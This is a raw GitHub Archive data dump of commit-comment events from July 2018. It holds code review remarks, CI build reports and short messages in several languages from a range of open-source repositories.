{"id":"7934016257","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"linuxmint/mintmenu"},"payload":{"comment":{"id":29633706,"position":null,"line":null,"path":null,"commit_id":"841bce86cbe283678b8f5434303c0e0e43f1158e","created_at":"2018-07-08T14:15:42Z","updated_at":"2018-07-08T14:15:42Z","author_association":"MEMBER","body":"It's exactly the opposite... that's why I had to add versions in https://github.com/linuxmint/mintmenu/pull/171"}},"created_at":"2018-07-08T14:15:42Z"}
{"id":"7934016597","type":"CommitCommentEvent","actor":{"login":"djom1709"},"repo":{"name":"ReinProject/bitcoin-signature-tool"},"payload":{"comment":{"id":29633708,"position":null,"line":null,"path":null,"commit_id":"f3893c836c3d1565c35aec2eefc770d422270832","created_at":"2018-07-08T14:15:56Z","updated_at":"2018-07-08T14:15:56Z","author_association":"NONE","body":"Link wallet address LXKBQqBHuQsiLLntppWEBjRnADKW9oZLVU to CoinPot account dnarimov1709@gmail.com"}},"created_at":"2018-07-08T14:15:56Z"}
{"id":"7934016728","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29633710,"position":61,"line":47,"path":"Dodo.Core.Test/CityDepartmentTest.cs","commit_id":"1b333e98bc06e3c6aa3c2ef43dd7c3b8a0f31c20","created_at":"2018-07-08T14:16:00Z","updated_at":"2018-07-08T14:16:00Z","author_association":"MEMBER","body":"Грамматически более верно было бы \r\n`WhenCreateDepartmentCultureData_...`\r\nи еще оно не Empty, а NotFilled.\r\nДавайте в тестах использовать тот же доменный язык, что и в коде.\r\nЕсли он в коде неправильный - исправьте, но он в любом случае должен быть согласованным."}},"created_at":"2018-07-08T14:16:00Z"}
{"id":"7934017811","type":"CommitCommentEvent","actor":{"login":"djom1709"},"repo":{"name":"ReinProject/bitcoin-signature-tool"},"payload":{"comment":{"id":29633714,"position":null,"line":null,"path":null,"commit_id":"f3893c836c3d1565c35aec2eefc770d422270832","created_at":"2018-07-08T14:16:41Z","updated_at":"2018-07-08T14:16:41Z","author_association":"NONE","body":"Link wallet address LXKBQqBHuQsiLLntppWEBjRnADKW9oZLVU to CoinPot account dnarimov1709@gmail.com"}},"created_at":"2018-07-08T14:16:41Z"}
{"id":"7934020437","type":"CommitCommentEvent","actor":{"login":"JarekParal"},"repo":{"name":"RoboticsBrno/RoboticsBrno-guides"},"payload":{"comment":{"id":29633723,"position":24,"line":243,"path":"RoboticsManual/software.tex","commit_id":"53cbea5cb9b8b926f25dfe0e7b915f499efbb124","created_at":"2018-07-08T14:18:25Z","updated_at":"2018-07-08T14:18:25Z","author_association":"MEMBER","body":"Ok bereme zpět, máš to napsaný správně. "}},"created_at":"2018-07-08T14:18:25Z"}
{"id":"7934021029","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29633727,"position":81,"line":58,"path":"Dodo.Core.Test/CityDepartmentTest.cs","commit_id":"1b333e98bc06e3c6aa3c2ef43dd7c3b8a0f31c20","created_at":"2018-07-08T14:18:49Z","updated_at":"2018-07-08T14:18:49Z","author_association":"MEMBER","body":"в тестах должны быть понятные данные, похожие на реальность.\r\nКультуры uru_URU не бывает."}},"created_at":"2018-07-08T14:18:49Z"}
{"id":"7934021713","type":"CommitCommentEvent","actor":{"login":"StrikerX3"},"repo":{"name":"StrikerX3/OpenXBOX"},"payload":{"comment":{"id":29633728,"position":null,"line":null,"path":null,"commit_id":"d59db53b1f369cd583ca8b3f2593953d0c972404","created_at":"2018-07-08T14:19:19Z","updated_at":"2018-07-08T14:19:19Z","author_association":"OWNER","body":"Oh, that was not your fault! "}},"created_at":"2018-07-08T14:19:19Z"}
{"id":"7934021889","type":"CommitCommentEvent","actor":{"login":"lasers"},"repo":{"name":"ultrabug/py3status"},"payload":{"comment":{"id":29633729,"position":null,"line":null,"path":null,"commit_id":"e3a189b03e81bf446ef37e424ad3ea7a11a92c2a","created_at":"2018-07-08T14:19:27Z","updated_at":"2018-07-08T14:19:27Z","author_association":"CONTRIBUTOR","body":"@ultrabug Greeting, I have a solution. Ugly, but speedy. Hear me out.\r\n\r\nLet me do what I want for `py3status version 3.12`. I aim to close many issues and pull requests as I can for a day.\r\n\r\nSome things won't be merged since I request a feedback from your friend.\r\nSome things would be new, but I do not expect any problems with merging.\r\nSome things could be rage-inducing, but would close an issue.\r\nSome things we could merge and let users report bugs.\r\nSome things I would like to go through again... Those won't be merged.\r\n\r\nSome configs will be dropped because of transference between formats, missed backward compatibility, or conflicts. However, this would simplify things more because we would have fewer issues, pull requests and bugs.\r\n\r\nUsers would be exposed with new changes...  eg, more colors, more configs, more\r\nthings to customize, and even the new modules too.\r\n\r\nAfter `py3status version 3.12`, you can delist me from collaborators. And when my pull requests gets zeroed out (not in `3.12`), you can block me for contributing too much to this project. I think it would make your friend happy. Ecstatic, even. :grin:\r\n\r\nThis should happen soon so we can release `3.12` next day... as to skip out on having to deprecate (missed) plural `path/paths` inconsistency and for me to clear out things I'm finished with, but sometimes still perform idle tweaks on. *Caveats:* Post-reviews and not reverting.\r\n\r\nTL;DR: Can I haz `3.12`? Collaborator for a day?"}},"created_at":"2018-07-08T14:19:27Z"}
{"id":"7934022512","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29633730,"position":null,"line":null,"path":null,"commit_id":"1b333e98bc06e3c6aa3c2ef43dd7c3b8a0f31c20","created_at":"2018-07-08T14:19:49Z","updated_at":"2018-07-08T14:19:49Z","author_association":"MEMBER","body":"В одном файле 2 тестовых класса. Разделите."}},"created_at":"2018-07-08T14:19:49Z"}
{"id":"7934023756","type":"CommitCommentEvent","actor":{"login":"brianmiyaji"},"repo":{"name":"ThemeBoy/SportsPress"},"payload":{"comment":{"id":29633735,"position":null,"line":null,"path":null,"commit_id":"51e5ba02b25542a0a8bde497a05a80e9e2e5e9a9","created_at":"2018-07-08T14:20:37Z","updated_at":"2018-07-08T14:20:37Z","author_association":"COLLABORATOR","body":"@savvasha Should we be doing this? Doesn't this affect non-SP pages (posts, pages, attachments) as well?"}},"created_at":"2018-07-08T14:20:37Z"}
{"id":"7934024945","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29633736,"position":61,"line":47,"path":"Dodo.Core.Test/CityDepartmentTest.cs","commit_id":"1b333e98bc06e3c6aa3c2ef43dd7c3b8a0f31c20","created_at":"2018-07-08T14:21:26Z","updated_at":"2018-07-08T14:21:26Z","author_association":"MEMBER","body":"Еще тесты на конструктор можно называть\r\n`ByDefaultDepartmentCultureData_...`"}},"created_at":"2018-07-08T14:21:26Z"}
{"id":"7934025341","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29633737,"position":12,"line":12,"path":"StudentIQTest/src/main/java/ru/otus/elena/studentiqtest/Main.java","commit_id":"51bc09764e8aaecf7ab37601409a90d7367f5e58","created_at":"2018-07-08T14:21:42Z","updated_at":"2018-07-08T14:21:42Z","author_association":"NONE","body":"Лучше получать по интерфейсу - StudentIQTest"}},"created_at":"2018-07-08T14:21:42Z"}
{"id":"7934026116","type":"CommitCommentEvent","actor":{"login":"dimatto"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29633739,"position":null,"line":null,"path":null,"commit_id":"c351abecfaf3274ce503ec4a5440d1c56044c44e","created_at":"2018-07-08T14:22:17Z","updated_at":"2018-07-08T14:22:17Z","author_association":"NONE","body":"Only select nginx(no-ssl), deselect all other packages(including all-module) in menuconfig, and deselect naxsi module, still download naxsi and other modules, it seems “ifneq ($(BUILD_VARIANT),all-module)” clause doesn’t take effect."}},"created_at":"2018-07-08T14:22:17Z"}
{"id":"7934026784","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29633742,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-08T14:22:43Z","updated_at":"2018-07-08T14:22:43Z","author_association":"NONE","body":"@FauziAkram  can you document the tests used to make this combo ?\r\n\r\nMaybe only one of them provides benefit at longer tc.\r\nThis would not be a reason to commit the others too.\r\n"}},"created_at":"2018-07-08T14:22:43Z"}
{"id":"7934035426","type":"CommitCommentEvent","actor":{"login":"khaledhosny"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29633769,"position":null,"line":null,"path":null,"commit_id":"537cb5775feecf235320ef1f3de0dd39d4381dcd","created_at":"2018-07-08T14:28:36Z","updated_at":"2018-07-08T14:28:36Z","author_association":"COLLABORATOR","body":"Personally, I can’t think of a case where I want the test suite to continue after the first failure, wasting time and resources on tests that were also likely fail, while what I usually will need is to stop the tests and fix the issue then try again. But if you think otherwise, feel free to change it as you suggest."}},"created_at":"2018-07-08T14:28:36Z"}
{"id":"7934035595","type":"CommitCommentEvent","actor":{"login":"KyeNormanGill"},"repo":{"name":"vzwGrey/test"},"payload":{"comment":{"id":29633771,"position":null,"line":null,"path":null,"commit_id":"6e433b98f92fd5cd1fcde2fa72387080d436dd1f","created_at":"2018-07-08T14:28:44Z","updated_at":"2018-07-08T14:28:44Z","author_association":"NONE","body":"Lookin good. Keep it up"}},"created_at":"2018-07-08T14:28:44Z"}
{"id":"7934036598","type":"CommitCommentEvent","actor":{"login":"lvyunlong"},"repo":{"name":"lvyunlong/demo"},"payload":{"comment":{"id":29633772,"position":null,"line":null,"path":null,"commit_id":"1a4821818d4f62b315c2f84995c76f6c991617e5","created_at":"2018-07-08T14:29:28Z","updated_at":"2018-07-08T14:29:28Z","author_association":"OWNER","body":"##随便写点吧"}},"created_at":"2018-07-08T14:29:28Z"}
{"id":"7934036921","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29633773,"position":19,"line":19,"path":"StudentIQTest/src/test/java/ru/otus/elena/studentiqtest/acquaintance/AcquaintanceImplTest.java","commit_id":"51bc09764e8aaecf7ab37601409a90d7367f5e58","created_at":"2018-07-08T14:29:41Z","updated_at":"2018-07-08T14:29:41Z","author_association":"NONE","body":"Угу - это можно делать и без контекста. Простым классом. \r\nДа, и тут будет чтение. В автотесты лучше нельзя помещать ввод пользователя. Основная их идея - чтобы они атвоматически запускались без пользователя."}},"created_at":"2018-07-08T14:29:41Z"}
{"id":"7934037121","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29633774,"position":19,"line":19,"path":"StudentIQTest/src/test/java/ru/otus/elena/studentiqtest/acquaintance/AcquaintanceImplTest.java","commit_id":"51bc09764e8aaecf7ab37601409a90d7367f5e58","created_at":"2018-07-08T14:29:50Z","updated_at":"2018-07-08T14:29:50Z","author_association":"NONE","body":"ПОэтому предлагаю просто убрать)"}},"created_at":"2018-07-08T14:29:50Z"}
{"id":"7934037962","type":"CommitCommentEvent","actor":{"login":"quercitron"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":29633775,"position":24,"line":115,"path":"Mage.Tests/src/test/java/org/mage/test/sets/BoosterGenerationTest.java","commit_id":"36c004122ab525f53afec266018a09377de40fd8","created_at":"2018-07-08T14:30:20Z","updated_at":"2018-07-08T14:30:20Z","author_association":"CONTRIBUTOR","body":"Good comments, thank you!"}},"created_at":"2018-07-08T14:30:20Z"}
{"id":"7934038708","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29633778,"position":17,"line":17,"path":"StudentIQTest/src/test/java/ru/otus/elena/studentiqtest/iqtest/IQTestImplTest.java","commit_id":"51bc09764e8aaecf7ab37601409a90d7367f5e58","created_at":"2018-07-08T14:30:47Z","updated_at":"2018-07-08T14:30:47Z","author_association":"NONE","body":"А вот через System.setIn() можно подсунуть поток с ответами."}},"created_at":"2018-07-08T14:30:47Z"}
{"id":"7934039657","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29633780,"position":17,"line":17,"path":"StudentIQTest/src/test/java/ru/otus/elena/studentiqtest/testresult/TestResultImplTest.java","commit_id":"51bc09764e8aaecf7ab37601409a90d7367f5e58","created_at":"2018-07-08T14:31:27Z","updated_at":"2018-07-08T14:31:27Z","author_association":"NONE","body":"Непонятно что тестирует тест) Если вывод - то он не анализируется."}},"created_at":"2018-07-08T14:31:27Z"}
{"id":"7934039768","type":"CommitCommentEvent","actor":{"login":"khaledhosny"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29633781,"position":19,"line":711,"path":"python/psautohint/__main__.py","commit_id":"cbd611582f48f0e4634f9fba66760c44df40c4fd","created_at":"2018-07-08T14:31:32Z","updated_at":"2018-07-08T14:31:32Z","author_association":"COLLABORATOR","body":"Usually what I want is to see where the issue cam from, and try to fix it. Previously this was nearly impossible without grepping the source code for the exception message (and being lucky enough to know where to look). That felt unusual for Python, for me at least, but if that is not the case then we can have `--debug` or something."}},"created_at":"2018-07-08T14:31:32Z"}
{"id":"7934041422","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages"},"payload":{"comment":{"id":29633786,"position":null,"line":null,"path":null,"commit_id":"140c86014dd4fbf6a9c5c6292a0029d90363fafe","created_at":"2018-07-08T14:32:41Z","updated_at":"2018-07-08T14:32:41Z","author_association":"CONTRIBUTOR","body":"==> Starting build()...\r\nError: Make sure you have a working sip on your PATH or use the --sip argument\r\nto explicitly specify a working sip.\r\n"}},"created_at":"2018-07-08T14:32:41Z"}
{"id":"7934041812","type":"CommitCommentEvent","actor":{"login":"michal-bootcamp"},"repo":{"name":"MariuszSzlachta/15.6"},"payload":{"comment":{"id":29633788,"position":123,"line":123,"path":"script.js","commit_id":"21fd4a1ea660c10026f16740e8e505f9645f9209","created_at":"2018-07-08T14:32:56Z","updated_at":"2018-07-08T14:32:56Z","author_association":"NONE","body":"`results` mozesz przeniesc do konstruktora, analogicznie jak masz `display` i wtedy przy tworzeniu stopera mozesz zapisac kolejny element po przecinku:\r\n`const stopwatch = new Stopwatch(document.querySelector('.stopwatch'), document.querySelector('.results'));`"}},"created_at":"2018-07-08T14:32:56Z"}
{"id":"7934045838","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29633794,"position":18,"line":37,"path":"aco.h","commit_id":"0a33bdd2d786c7ec6b7cc85dfe777326762db5ae","created_at":"2018-07-08T14:35:36Z","updated_at":"2018-07-08T14:35:36Z","author_association":"NONE","body":"* I guess that this simple change will matter for C++ applications, won't it?\r\n* It seems that you will struggle with the appropriate selection of version numbers.\r\n* Are you aware of the possibility with combining some changes at once from development branches (by “[octopus merges](http://www.freblogg.com/2016/12/git-octopus-merge.html \"Article “Understanding git octopus merge” from 2016-12-21\")”)?"}},"created_at":"2018-07-08T14:35:36Z"}
{"id":"7934045848","type":"CommitCommentEvent","actor":{"login":"diefirma"},"repo":{"name":"diefirma/hello-world"},"payload":{"comment":{"id":29633795,"position":1,"line":1,"path":"README.md","commit_id":"a2b21d2019e5ce07deae210e2e056592471f9e5d","created_at":"2018-07-08T14:35:37Z","updated_at":"2018-07-08T14:35:37Z","author_association":"OWNER","body":"This is my first repository.  Many more to come I hope "}},"created_at":"2018-07-08T14:35:37Z"}
{"id":"7934049003","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29633804,"position":null,"line":null,"path":null,"commit_id":"a9f194398af68ab8b5cd15b423c4bf77ae661adb","created_at":"2018-07-08T14:37:39Z","updated_at":"2018-07-08T14:37:39Z","author_association":"MEMBER","body":"Look at the Sega Model 1 I/O boards (src/mame/machine/model1io.{h,cpp} and src/mame/machien/model1io2.{h,cpp}, used by src/mame/drivers/model1.cpp and src/mame/drivers/model2.cpp) - you can bind devcb to I/O ports among other things."}},"created_at":"2018-07-08T14:37:39Z"}
{"id":"7934049717","type":"CommitCommentEvent","actor":{"login":"243626730"},"repo":{"name":"243626730/BLOG"},"payload":{"comment":{"id":29633806,"position":30,"line":30,"path":"demo.html","commit_id":"30e0af0b53d94c821f88b762b92a523a92786346","created_at":"2018-07-08T14:38:07Z","updated_at":"2018-07-08T14:38:07Z","author_association":"OWNER","body":"<div class=\"nav\"></div>"}},"created_at":"2018-07-08T14:38:07Z"}
{"id":"7934051799","type":"CommitCommentEvent","actor":{"login":"Demonstrandum"},"repo":{"name":"Ominousness/last_note"},"payload":{"comment":{"id":29633812,"position":null,"line":null,"path":null,"commit_id":"33bd83e91acfae218e2380f4371417fbfed34f3a","created_at":"2018-07-08T14:39:36Z","updated_at":"2018-07-08T14:39:36Z","author_association":"NONE","body":"Hot, you should consider hosting it too "}},"created_at":"2018-07-08T14:39:36Z"}
{"id":"7934053629","type":"CommitCommentEvent","actor":{"login":"MrFini"},"repo":{"name":"MrFiniOrg/MySql-DB-Connection"},"payload":{"comment":{"id":29633821,"position":null,"line":null,"path":null,"commit_id":"04415b8833092630a239131c04b3ff91bda1d9d8","created_at":"2018-07-08T14:40:52Z","updated_at":"2018-07-08T14:40:52Z","author_association":"MEMBER","body":"I wanted to change an image"}},"created_at":"2018-07-08T14:40:52Z"}
{"id":"7934053907","type":"CommitCommentEvent","actor":{"login":"SpaSinghOut"},"repo":{"name":"Truthinthelight/TyrantCA"},"payload":{"comment":{"id":29633823,"position":null,"line":null,"path":null,"commit_id":"5aa800a3a4ee3c2651aae379b46187c6fa78a576","created_at":"2018-07-08T14:41:04Z","updated_at":"2018-07-08T14:41:04Z","author_association":"NONE","body":"👍"}},"created_at":"2018-07-08T14:41:04Z"}
{"id":"7934057764","type":"CommitCommentEvent","actor":{"login":"robssanches"},"repo":{"name":"inc2734/smart-custom-fields"},"payload":{"comment":{"id":29633832,"position":null,"line":null,"path":null,"commit_id":"7ba867369c78382e7562a0b790579f37d663e04f","created_at":"2018-07-08T14:43:38Z","updated_at":"2018-07-08T14:43:38Z","author_association":"CONTRIBUTOR","body":"These changes solve the problem of issue #19 "}},"created_at":"2018-07-08T14:43:38Z"}
{"id":"7934058104","type":"CommitCommentEvent","actor":{"login":"vlachoudis"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29633833,"position":null,"line":null,"path":null,"commit_id":"7d780a729102f0244c6a43bf68c381be87f22166","created_at":"2018-07-08T14:43:51Z","updated_at":"2018-07-08T14:43:51Z","author_association":"OWNER","body":"I have recently uploaded a branch called \"v3\" which is meant for python v3. Is still in very experimental state, but every change now I am trying to sync it with that, so in the future to fully move to python v3."}},"created_at":"2018-07-08T14:43:51Z"}
{"id":"7934058444","type":"CommitCommentEvent","actor":{"login":"CrystalSilicon"},"repo":{"name":"CrystalSilicon/pretask"},"payload":{"comment":{"id":29633835,"position":84,"line":84,"path":"LinkTask.cpp","commit_id":"30369a91c0f7c0bb1f6efc1f95db039a7be335fc","created_at":"2018-07-08T14:44:06Z","updated_at":"2018-07-08T14:44:06Z","author_association":"OWNER","body":"![linktask1](https://user-images.githubusercontent.com/40954016/42420971-66f5a7de-8300-11e8-9dba-b9cf34692dbd.PNG)\r\n![linktask2](https://user-images.githubusercontent.com/40954016/42420972-677c95f0-8300-11e8-8a16-d6dd88dd32c1.PNG)\r\n"}},"created_at":"2018-07-08T14:44:06Z"}
{"id":"7934060407","type":"CommitCommentEvent","actor":{"login":"CrystalSilicon"},"repo":{"name":"CrystalSilicon/pretask"},"payload":{"comment":{"id":29633840,"position":30,"line":30,"path":"StringTask.java","commit_id":"30369a91c0f7c0bb1f6efc1f95db039a7be335fc","created_at":"2018-07-08T14:45:16Z","updated_at":"2018-07-08T14:45:16Z","author_association":"OWNER","body":"![stringtask1](https://user-images.githubusercontent.com/40954016/42420980-92ca8546-8300-11e8-8b38-85d980ba70d8.PNG)\r\n![stringtask2](https://user-images.githubusercontent.com/40954016/42420981-93d93b58-8300-11e8-9387-3d3738f08f28.PNG)\r\n"}},"created_at":"2018-07-08T14:45:16Z"}
{"id":"7934060470","type":"CommitCommentEvent","actor":{"login":"akramtexas"},"repo":{"name":"akramtexas/edgex-go"},"payload":{"comment":{"id":29633842,"position":null,"line":null,"path":null,"commit_id":"33370d125708c4961c09ba7ef25ee773f9fc9330","created_at":"2018-07-08T14:45:18Z","updated_at":"2018-07-08T14:45:18Z","author_association":"OWNER","body":"This change-set fixes another **HTTP 405** (\"Method Not Allowed\") error."}},"created_at":"2018-07-08T14:45:18Z"}
{"id":"7934063850","type":"CommitCommentEvent","actor":{"login":"skmedix"},"repo":{"name":"Commit451/skyhook"},"payload":{"comment":{"id":29633850,"position":null,"line":null,"path":null,"commit_id":"19f2ce150364aca22979c831e2d0ed50f06b6b8d","created_at":"2018-07-08T14:47:31Z","updated_at":"2018-07-08T14:47:31Z","author_association":"CONTRIBUTOR","body":"¯\\_(ツ)_/¯"}},"created_at":"2018-07-08T14:47:31Z"}
{"id":"7934064004","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29633851,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-08T14:47:38Z","updated_at":"2018-07-08T14:47:38Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2328 of 2328 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T14:47:38Z"}
{"id":"7934067961","type":"CommitCommentEvent","actor":{"login":"eed3si9n"},"repo":{"name":"sbt/sbt"},"payload":{"comment":{"id":29633858,"position":137,"line":146,"path":"main/src/main/scala/sbt/internal/CrossJava.scala","commit_id":"2da1aa61eb499c01d14ca64491b1a46f3599269a","created_at":"2018-07-08T14:50:18Z","updated_at":"2018-07-08T14:50:18Z","author_association":"MEMBER","body":"O wow. contains is the worst. Thanks!"}},"created_at":"2018-07-08T14:50:18Z"}
{"id":"7934069649","type":"CommitCommentEvent","actor":{"login":"2604150210"},"repo":{"name":"webturing/cplusplus"},"payload":{"comment":{"id":29633862,"position":14,"line":14,"path":"oj.noi.cn/1131士兵排队(贪心，二分枚举）.cpp","commit_id":"0650cf9da7228d9bd6fb14705c835576c08281dc","created_at":"2018-07-08T14:51:23Z","updated_at":"2018-07-08T14:51:23Z","author_association":"COLLABORATOR","body":"check这个检验函数我没有看懂"}},"created_at":"2018-07-08T14:51:23Z"}
{"id":"7934070725","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29633863,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-08T14:52:11Z","updated_at":"2018-07-08T14:52:11Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-08T14:52:11Z"}
{"id":"7934071789","type":"CommitCommentEvent","actor":{"login":"Alexkho82"},"repo":{"name":"justjavac/free-programming-books-zh_CN"},"payload":{"comment":{"id":29633868,"position":null,"line":null,"path":null,"commit_id":"2d6a3c5947cce3450bd40e6ae8cc6af0b0313924","created_at":"2018-07-08T14:52:55Z","updated_at":"2018-07-08T14:52:55Z","author_association":"NONE","body":"2da3c5"}},"created_at":"2018-07-08T14:52:55Z"}
{"id":"7934072337","type":"CommitCommentEvent","actor":{"login":"cook-a-doodle-doo"},"repo":{"name":"fuller-kport/server_lesson"},"payload":{"comment":{"id":29633869,"position":null,"line":null,"path":null,"commit_id":"e29f79c20bb6d17fe3f48e7b2005544822211393","created_at":"2018-07-08T14:53:19Z","updated_at":"2018-07-08T14:53:19Z","author_association":"CONTRIBUTOR","body":"branch切り忘れてました\r\nすみません"}},"created_at":"2018-07-08T14:53:19Z"}
{"id":"7934073433","type":"CommitCommentEvent","actor":{"login":"herunlei"},"repo":{"name":"zlkca/etuan"},"payload":{"comment":{"id":29633872,"position":119,"line":38,"path":"src/app/shared/address-input/address-input.component.ts","commit_id":"376ec90cf053ab603509693c7bf34d452759752b","created_at":"2018-07-08T14:54:04Z","updated_at":"2018-07-08T14:54:04Z","author_association":"COLLABORATOR","body":"set area to Canada only"}},"created_at":"2018-07-08T14:54:04Z"}
{"id":"7934073945","type":"CommitCommentEvent","actor":{"login":"Alexkho82"},"repo":{"name":"justjavac/free-programming-books-zh_CN"},"payload":{"comment":{"id":29633873,"position":8,"line":551,"path":"README.md","commit_id":"2d6a3c5947cce3450bd40e6ae8cc6af0b0313924","created_at":"2018-07-08T14:54:23Z","updated_at":"2018-07-08T14:54:23Z","author_association":"NONE","body":"#551"}},"created_at":"2018-07-08T14:54:23Z"}
{"id":"7934074628","type":"CommitCommentEvent","actor":{"login":"herunlei"},"repo":{"name":"zlkca/etuan"},"payload":{"comment":{"id":29633874,"position":130,"line":49,"path":"src/app/shared/address-input/address-input.component.ts","commit_id":"376ec90cf053ab603509693c7bf34d452759752b","created_at":"2018-07-08T14:54:52Z","updated_at":"2018-07-08T14:54:52Z","author_association":"COLLABORATOR","body":"let google map place autocomplete to read options for extra settings"}},"created_at":"2018-07-08T14:54:52Z"}
{"id":"7934076521","type":"CommitCommentEvent","actor":{"login":"herunlei"},"repo":{"name":"zlkca/etuan"},"payload":{"comment":{"id":29633875,"position":null,"line":null,"path":null,"commit_id":"376ec90cf053ab603509693c7bf34d452759752b","created_at":"2018-07-08T14:56:10Z","updated_at":"2018-07-08T14:56:10Z","author_association":"COLLABORATOR","body":"The visual studio code formats the file, so it is hard to find differences. I write two single comment to point out differences."}},"created_at":"2018-07-08T14:56:10Z"}
{"id":"7934077949","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29633876,"position":null,"line":null,"path":null,"commit_id":"07dda535fbba5325b4ddbe577e9fdbc75876a6a7","created_at":"2018-07-08T14:57:11Z","updated_at":"2018-07-08T14:57:11Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-07dda535fbba5325b4ddbe577e9fdbc75876a6a7-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-08T14:57:11Z"}
{"id":"7934078777","type":"CommitCommentEvent","actor":{"login":"nbolton"},"repo":{"name":"symless/synergy-core"},"payload":{"comment":{"id":29633879,"position":null,"line":null,"path":null,"commit_id":"cb1ba83a3912d443568072420ecce975e09fae10","created_at":"2018-07-08T14:57:45Z","updated_at":"2018-07-08T14:57:45Z","author_association":"MEMBER","body":"#6348"}},"created_at":"2018-07-08T14:57:45Z"}
{"id":"7934079109","type":"CommitCommentEvent","actor":{"login":"Alexkho82"},"repo":{"name":"justjavac/free-programming-books-zh_CN"},"payload":{"comment":{"id":29633883,"position":null,"line":null,"path":null,"commit_id":"8132a652b66bf1711b29ffbe6d580a588a56437c","created_at":"2018-07-08T14:57:58Z","updated_at":"2018-07-08T14:57:58Z","author_association":"NONE","body":"8132a65"}},"created_at":"2018-07-08T14:57:58Z"}
{"id":"7934079793","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/Homework"},"payload":{"comment":{"id":29633884,"position":39,"line":39,"path":"RomanNumerals.java","commit_id":"d9dc2bf34a2bb15af55113af9bacdc6181810275","created_at":"2018-07-08T14:58:26Z","updated_at":"2018-07-08T14:58:26Z","author_association":"CONTRIBUTOR","body":"Recursive-happy, ah? This is better achieved by iteration.\r\nRemind me to talk to you about tail-recursion, as an extra-curricular."}},"created_at":"2018-07-08T14:58:26Z"}
